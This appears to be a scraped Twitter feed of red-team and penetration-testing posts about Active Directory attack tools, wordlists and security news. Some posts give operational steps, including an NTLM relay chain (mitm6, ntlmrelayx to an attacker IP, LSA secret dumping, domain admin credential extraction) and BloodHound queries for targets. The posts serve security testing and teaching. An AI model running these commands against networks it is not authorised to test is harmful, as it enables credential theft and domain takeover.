Your Domain Admin
@yourDomainAdmin
Bloomberg is looking for product security engineers, appsec engineers, security architects. VISA sponsorship. DM if interested.
Devs watching QA test the product
Good wordlists are so important when discovering content on an asset. At @assetnote, we've built a wordlists site that updates itself on a monthly basis. For added value, we've included some of our best wordlists that we've manually collected too. wordlists.assetnote.io
I don't think that most people use Amass effectively, or understand how powerful it is. Here's how I personally use it. medium.com/@hakluke/haklu…
Here are the slides for The Bug Hunter's Methodology v4 Recon edition. Enjoy! drive.google.com/file/d/1aG_qqR…
Find all the users with the same name that belong to different domains: MATCH (u:User),(b:User) WHERE split(u.name, '@')[0] = split(b.name,'@')[0] AND u.domain <> b.domain AND toint(split(u.objectid, '-')[7]) > 1000 RETURN
#ActiveDirectory cross-domain and cross-forest duplicate password discovery and offline password hash comparison against HaveIBeenPwned is now possible with #DSInternals 4.2. github.com/MichaelGrafnet… Thanks @alexseigler.
CVE-2020-0688: REMOTE CODE EXECUTION ON MICROSOFT EXCHANGE SERVER THROUGH FIXED CRYPTOGRAPHIC KEYS - RCE with system privileges on all exchange server 😱 #infosec #pentest #redteam thezdi.com/blog/2020/2/24…
#BloodHound 3.0 is here! BloodHound: bit.ly/GetBloodHound Blog: bit.ly/3bu3chl Webinar deck: bit.ly/3837gTx Webinar recording coming soon #BloodHound 3.0 shirt: (all profits go to @MDAorg) customink.com/fundraising/th…
Getting shells with network-access only in <15 minutes: 1. Generate smb relay list with crackmapexec 2. Set up ntlmrelayx with smb2support and -socks 3. Fire up responder + bettercap (arp,dns+dhcpv6 spoofing) 4. ntlmrelayx sessions can be used with atexec and smbexec 5. Related:
Regex cheatsheet for the haters: github.com/geongeorge/i-h… cc @geongeorgek
Join me and @CptJesus on Tuesday, February 11th as we unveil #BloodHound 3.0! We will demo new attack primitives, performance improvements, and changes in the GUI. Register for the webinar here (recording available afterwards): specterops.zoom.us/webinar/regist…
New @OutflankNL tool coming soon... Zipper, a CobaltStrike tool written in C which allows you to compress files and folders from local and UNC paths. Useful for RedTeams when large files/folders need to be exfiltrated.
Spray-AD, a new @OutflankNL Kerberos password spraying tool for Cobalt Strike that might come in handy when assessing Active Directory environments for weak passwords (generates event IDs 4771 instead of 4625). github.com/outflanknl/Spr…
Sharphound: "MATCH (c:Computer {unconstraineddelegation:true}) return c". Find all those boxes and use them for Print Spooler fun!
#EASY cme smb $hosts --gen-relay-list relay.txt mitm6 -i eth0 -d $domain ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt extract "Admin" hash cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa cp /root/.cme/logs/*.secrets |sort -u extract DA cred
I just pushed a new #mimikatz update, with more DPAPI & Crypto stuff inside > github.com/gentilkiwi/mim… 'cause you know, who don't love moaaaar credentials?
Imcat: shows images in your terminal directly with ANSI colors, resizing to the width. Super simple, super useful. github.com/stolk/imcat
I wrote up a quick POC, RemoteViewing, to demo RDP credential theft (adapted from @0x09AL post => mdsec.co.uk/2019/11/rdpthi…) using EasyHook and Donut ☠️🖥️. More details on GitHub => github.com/FuzzySecurity/…
Red Team Operations video series with Cobalt Strike 4.0 looks *amazing*. youtube.com/playlist?list=…